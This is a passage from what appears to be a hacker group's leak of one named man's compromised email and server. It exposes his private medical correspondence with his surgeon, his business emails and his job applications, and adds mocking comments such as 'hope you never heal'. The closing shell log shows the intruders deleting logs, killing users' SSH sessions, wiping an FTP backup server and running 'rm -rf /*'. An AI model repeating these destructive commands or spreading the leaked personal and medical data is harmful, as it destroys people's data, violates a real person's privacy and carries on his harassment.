pain when I stretch that leg. I start having knee bending although I am exercising and some ballerina. I am walking on walker before and after each click so I stretch my legs. I am doing 4 clicks per day since the start of lengthening and last month I am doing also some 3 clicks and some days off. I think I have missalignment based on XRAYS on my right leg. Regards Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.119.65 with SMTP id y1cs9458faq; Fri, 8 May 2009 10:34:07 -0700 (PDT) MIME-Version: 1.0 Received: by 10.223.115.12 with SMTP id g12mr2251770faq.92.1241804047120; Fri, 08 May 2009 10:34:07 -0700 (PDT) In-Reply-To: <4b20eb360905080029v2fdbe7d0t204174bda616430d@mail.gmail.com> References: <4b20eb360905080029v2fdbe7d0t204174bda616430d@mail.gmail.com> Date: Fri, 8 May 2009 19:34:07 +0200 Message-ID: Subject: Re: Glafkos Cyprys XRAYS at 4.7 CM From: Milorad Mitkovic To: Glafkos Charalambous Content-Type: multipart/alternative; boundary=001636c5b3511bfa6d04696a09d7 --001636c5b3511bfa6d04696a09d7 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Dear Mr. Glafkos, There is good healing on x-rays. There is no misalignment. Everything is still in normal borders. However, there is visible bars bending (more left) which is firs sign that ballerina foot wants to be developed as well as some knee bending. Where do you have pain? Is it on pin areas or just on breaking area below the pins as you mentioned. If braking area the best think is to stop lengthening several days and resume with 3 surfaces. Best regards Dr. Mitkovic ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 8 May 2009 10:46:10 -0700 (PDT) In-Reply-To: References: <4b20eb360905080029v2fdbe7d0t204174bda616430d@mail.gmail.com> Date: Fri, 8 May 2009 20:46:10 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905081046q3240d6baua467a67cd811104c@mail.gmail.com> Subject: Re: Glafkos Cyprys XRAYS at 4.7 CM From: Glafkos Charalambous To: Milorad Mitkovic Content-Type: multipart/alternative; boundary=001636c5b588354edb04696a3403 --001636c5b588354edb04696a3403 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello Dr. Thank you for the updates. I have problem on my right leg when I straight my legs its very hard but goes away after little exercise. On the left leg I have the pain above the bars where the bone is broke since 2 weeks and 1.5cm ballerina on that leg. Today and tomorrow I will not lengthen. Do you believe going only 3 clicks is better? I really don't have a problem if I have less complications and keep more flexibility. Waiting yours, Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.119.65 with SMTP id y1cs28741faq; Fri, 8 May 2009 14:10:03 -0700 (PDT) MIME-Version: 1.0 Received: by 10.223.123.129 with SMTP id p1mr2507648far.29.1241817002175; Fri, 08 May 2009 14:10:02 -0700 (PDT) In-Reply-To: <4b20eb360905081046q3240d6baua467a67cd811104c@mail.gmail.com> References: <4b20eb360905080029v2fdbe7d0t204174bda616430d@mail.gmail.com> <4b20eb360905081046q3240d6baua467a67cd811104c@mail.gmail.com> Date: Fri, 8 May 2009 23:10:02 +0200 Message-ID: Subject: Re: Glafkos Cyprys XRAYS at 4.7 CM From: Milorad Mitkovic To: Glafkos Charalambous Content-Type: multipart/alternative; boundary=001636c5a9ff4a6bdf04696d0dd1 --001636c5a9ff4a6bdf04696d0dd1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Yes for knee and ankle contracture prevention and treatment exercises are the best. It is good to rest and to do lengthening as slow as possible 2-3 surfaces/day. // We at anti-sec, hope you never heal :] ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 22 May 2009 02:39:11 -0700 (PDT) Date: Fri, 22 May 2009 12:39:11 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> Subject: Logo Design From: Glafkos Charalambous To: designhome11@gmail.com Content-Type: multipart/alternative; boundary=00163662e5db63c777046a7d08f8 --00163662e5db63c777046a7d08f8 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello, I speak with your cousin Design World and I will need a logo for my website http://webhostline.com/_new Can you come up with some revisions/samples? Price told me its $15USD Maybe I will need another 4-5 logos for other projects shortly ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.119.65 with SMTP id y1cs51909faq; Fri, 22 May 2009 05:11:46 -0700 (PDT) MIME-Version: 1.0 Received: by 10.114.170.1 with SMTP id s1mr7855704wae.57.1242994298310; Fri, 22 May 2009 05:11:38 -0700 (PDT) In-Reply-To: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> References: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> Date: Fri, 22 May 2009 17:41:38 +0530 Message-ID: <3d5db02e0905220511o60ffbcd7pb2f66a81c113de66@mail.gmail.com> Subject: Re: Logo Design From: Designer To: Glafkos Charalambous Content-Type: multipart/mixed; boundary=0016364c716b9bd457046a7f2953 --0016364c716b9bd457046a7f2953 Content-Type: multipart/alternative; boundary=0016364c716b9bd43e046a7f2951 --0016364c716b9bd43e046a7f2951 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit here is the logo attached... let me know if you need any changes... payment via paypal at thedesignideas@gmail.com Thanks. ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 22 May 2009 05:15:53 -0700 (PDT) In-Reply-To: <3d5db02e0905220511o60ffbcd7pb2f66a81c113de66@mail.gmail.com> References: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> <3d5db02e0905220511o60ffbcd7pb2f66a81c113de66@mail.gmail.com> Date: Fri, 22 May 2009 15:15:53 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905220515u4a9bf74do959b5ddb060a7873@mail.gmail.com> Subject: Re: Logo Design From: Glafkos Charalambous To: Designer Content-Type: multipart/alternative; boundary=001636c5ac93d4e08f046a7f38ef --001636c5ac93d4e08f046a7f38ef Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello mate.. I need something glossy with a logo and not only text. Something to match also the website in a nice and professional way. ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 22 May 2009 05:48:16 -0700 (PDT) In-Reply-To: <3d5db02e0905220539p401ea914n29001d179887af5f@mail.gmail.com> References: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> <3d5db02e0905220511o60ffbcd7pb2f66a81c113de66@mail.gmail.com> <4b20eb360905220515u4a9bf74do959b5ddb060a7873@mail.gmail.com> <3d5db02e0905220524w7ab34e1cr7717651baff182df@mail.gmail.com> <3d5db02e0905220539p401ea914n29001d179887af5f@mail.gmail.com> Date: Fri, 22 May 2009 15:48:16 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905220548w3105581es4752c68e54c2b476@mail.gmail.com> Subject: Re: Logo Design From: Glafkos Charalambous To: Designer Content-Type: multipart/alternative; boundary=001636c5a965a84196046a7face1 --001636c5a965a84196046a7face1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello mate, I need a good logo please something that has to do with the name of the domain and what it offers. I can draw also some logos with text and a graphic. I need something extreme please // Extreme is what you will get sir. wait till we hit the rm -rf / ;p ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Sat, 23 May 2009 02:57:12 -0700 (PDT) In-Reply-To: <3d5db02e0905222217x37c7de26s1c61bcb2605fefb2@mail.gmail.com> References: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> <3d5db02e0905220805m6dd27789i3878980e5ea8187d@mail.gmail.com> <4b20eb360905220807g2d56ec1apb4dc524e96a1bc55@mail.gmail.com> <3d5db02e0905220811m7d63a444w47911815ac7d4fa8@mail.gmail.com> <4b20eb360905220816o79304495v5b5f33ded1460edc@mail.gmail.com> <3d5db02e0905220818t2e7e618y52edd477a39f5a61@mail.gmail.com> <4b20eb360905220839r3352bb8dq75721458a7e4c267@mail.gmail.com> <3d5db02e0905220847q2640dedas7e775cf2a362b285@mail.gmail.com> <4b20eb360905221129o4338f92es8008dec0f170c00a@mail.gmail.com> <3d5db02e0905222217x37c7de26s1c61bcb2605fefb2@mail.gmail.com> Date: Sat, 23 May 2009 12:57:12 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905230257v72e85df4r16c4ff5c1e894ae4@mail.gmail.com> Subject: Re: Logo Design From: Glafkos Charalambous To: Designer Content-Type: multipart/alternative; boundary=001636c599ffb43cc2046a9166c6 --001636c599ffb43cc2046a9166c6 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello mate, Payment has been sent. Please do not disclose the LOGO anywhere on the net. Many Thanks, Glafkos // We would like to disclose your logos all over the net, link : http://rapidshare.com/files/242546059/logos.tar.html ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Sat, 9 May 2009 11:24:42 -0700 (PDT) Date: Sat, 9 May 2009 21:24:42 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905091124p4e821fbal1296aa4ec902901f@mail.gmail.com> Subject: Master on Information Security From: Glafkos Charalambous To: infosec@cs.jmu.edu Content-Type: multipart/mixed; boundary=0016368e30cce6971804697edb54 --0016368e30cce6971804697edb54 Content-Type: multipart/alternative; boundary=0016368e30cce6971304697edb52 --0016368e30cce6971304697edb52 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello, I am interested for an online master degree on information security. Could you please provide me with master degree total price I will need to pay if I take the degree? Kindly Regards, Glafkos Charalambous // Haha. Lesson #1: Learn to secure your own belongings. ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Wed, 6 May 2009 06:29:57 -0700 (PDT) Date: Wed, 6 May 2009 16:29:57 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905060629w559a79b2pd3e409acb983e326@mail.gmail.com> Subject: Freelancer seeking for job From: Glafkos Charalambous To: support@debliteck.com Content-Type: multipart/mixed; boundary=0016368e310f37651104693e6472 --0016368e310f37651104693e6472 Content-Type: multipart/alternative; boundary=0016368e310f37650c04693e6470 --0016368e310f37650c04693e6470 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello, I am a freelancer and I would like to work remotely on various web development projects. I am attaching you my CV for your reference. Regards, Charalambous Glafkos MCITP:Enterprise Admin, MCTS, CCNA, CHFI, CEH, ECSA, LPT, OCSP IT Solutions Knowledge Base - http://www.itsolutionskb.com ############################################################################ MIME-Version: 1.0 Sender: glafkos@gmail.com Received: by 10.223.119.65 with HTTP; Tue, 5 May 2009 03:19:10 -0700 (PDT) Date: Tue, 5 May 2009 13:19:10 +0300 Delivered-To: glafkos@gmail.com X-Google-Sender-Auth: afe880e2c71dda81 Message-ID: <4b20eb360905050319x3468b2adi5493b8b3546f86d4@mail.gmail.com> Subject: MyCV From: Glafkos Charalambous To: jobs@diktiagora.com Content-Type: multipart/mixed; boundary=0016e6d3853b1803ab0469279c27 --0016e6d3853b1803ab0469279c27 Content-Type: multipart/alternative; boundary=0016e6d3853b1803a50469279c25 --0016e6d3853b1803a50469279c25 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Dear, Based on your website vacancies for Application Developer I am attaching you my CV. Kindly Regards, Charalambous Glafkos ############################################################################ // Now to the best part, the rm -rf. sh-3.1# rm -rf /var/log/ sh-3.1# pwd /root sh-3.1# rm -rf * sh-3.1# who infosec pts/2 2009-06-09 05:57 (91.184.220.239) itkb pts/3 2009-06-09 05:57 (91.184.220.239) sh-3.1# ps aux | grep sshd root 1868 0.0 0.0 7288 1672 ? Ss Jun08 0:00 /usr/sbin/sshd root 12795 0.0 0.1 9872 3268 ? Ss 04:15 0:00 sshd: infosec [priv] infosec 12798 0.0 0.1 10456 2544 ? S 04:15 0:01 sshd: root 22034 0.0 0.1 9872 3332 ? Ss 05:56 0:00 sshd: infosec [priv] infosec 22036 0.0 0.1 9872 2192 ? S 05:57 0:00 sshd: infosec@pts/2 root 22069 0.0 0.1 9936 3324 ? Ss 05:57 0:00 sshd: itkb [priv] itkb 22151 0.0 0.1 9936 2184 ? S 05:57 0:00 sshd: itkb@pts/3 root 25084 0.0 0.0 7876 1432 pts/1 S+ 06:25 0:00 grep sshd sh-3.1# kill -9 22151 sh-3.1# kill -9 22036 sh-3.1# who sh-3.1# service sshd stop Stopping sshd: [ OK ] sh-3.1# ftp nowayout.myftp.org Connected to nowayout.myftp.org. 220 Microsoft FTP Service 504 Security mechanism not implemented. 504 Security mechanism not implemented. KERBEROS_V4 rejected as an authentication type Name (nowayout.myftp.org:infosec): backup 331 Password required for backup. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls -la 227 Entering Passive Mode (91,184,220,239,194,133). 125 Data connection already open; Transfer starting. 11-04-08 10:48AM 00-00-2007 05-01-09 07:21AM 01-05-2009 06-01-09 07:22AM 01-06-2009 02-02-09 08:27AM 02-02-2009 05-02-09 01:18PM 02-05-2009 06-02-09 07:21AM 02-06-2009 02-03-09 08:20AM 03-02-2009 06-03-09 07:09AM 03-06-2009 06-04-09 07:23AM 04-06-2009 06-05-09 07:10AM 05-06-2009 06-06-09 07:18AM 06-06-2009 06-07-09 07:19AM 07-06-2009 06-08-09 07:20AM 08-06-2009 05-09-09 08:29PM 09-05-2009 06-09-09 07:20AM 09-06-2009 05-10-09 10:38AM 10-05-2009 05-11-09 07:21AM 11-05-2009 05-12-09 07:19AM 12-05-2009 05-13-09 07:19AM 13-05-2009 05-14-09 07:18AM 14-05-2009 05-15-09 07:18AM 15-05-2009 05-16-09 07:20AM 16-05-2009 05-17-09 07:19AM 17-05-2009 05-18-09 07:19AM 18-05-2009 03-19-09 01:07PM 19-03-2009 05-19-09 07:21AM 19-05-2009 03-20-09 07:23AM 20-03-2009 05-20-09 07:20AM 20-05-2009 05-21-09 07:18AM 21-05-2009 05-22-09 07:20AM 22-05-2009 05-23-09 07:21AM 23-05-2009 05-24-09 07:21AM 24-05-2009 05-25-09 07:21AM 25-05-2009 05-26-09 07:21AM 26-05-2009 05-27-09 07:26AM 27-05-2009 04-28-09 07:21AM 28-04-2009 05-28-09 07:21AM 28-05-2009 01-29-09 08:20AM 29-01-2009 04-29-09 07:21AM 29-04-2009 05-29-09 07:09AM 29-05-2009 03-30-09 07:27AM 30-03-2009 04-30-09 07:24AM 30-04-2009 05-30-09 07:21AM 30-05-2009 01-31-09 08:27AM 31-01-2009 03-31-09 03:56PM 31-03-2009 05-31-09 07:20AM 31-05-2009 11-04-08 10:50AM Backup Scripts 04-17-09 10:40PM BT4_ 06-09-09 01:04PM christine 01-04-09 05:01PM 39192 OS-3588-exam.tgz.bz2 04-07-09 07:26AM OSCPFinalLab 11-14-08 02:58AM 872364 wordpress.2008-11-13.xml 226 Transfer complete. ftp> mdelete * // oops. sh-3.1# cd ~infosec sh-3.1# rm -rf * sh-3.1# ls -la total 12 drwx--x--x 2 infosec infosec 4096 Jun 9 06:35 . drwxr-xr-x 43 root root 4096 Jun 9 00:20 .. sh-3.1# cd ~ryb sh-3.1# rm -rf * sh-3.1# rm -rf /* & [1] 26243 We found our way in, will he found his way out of this mess?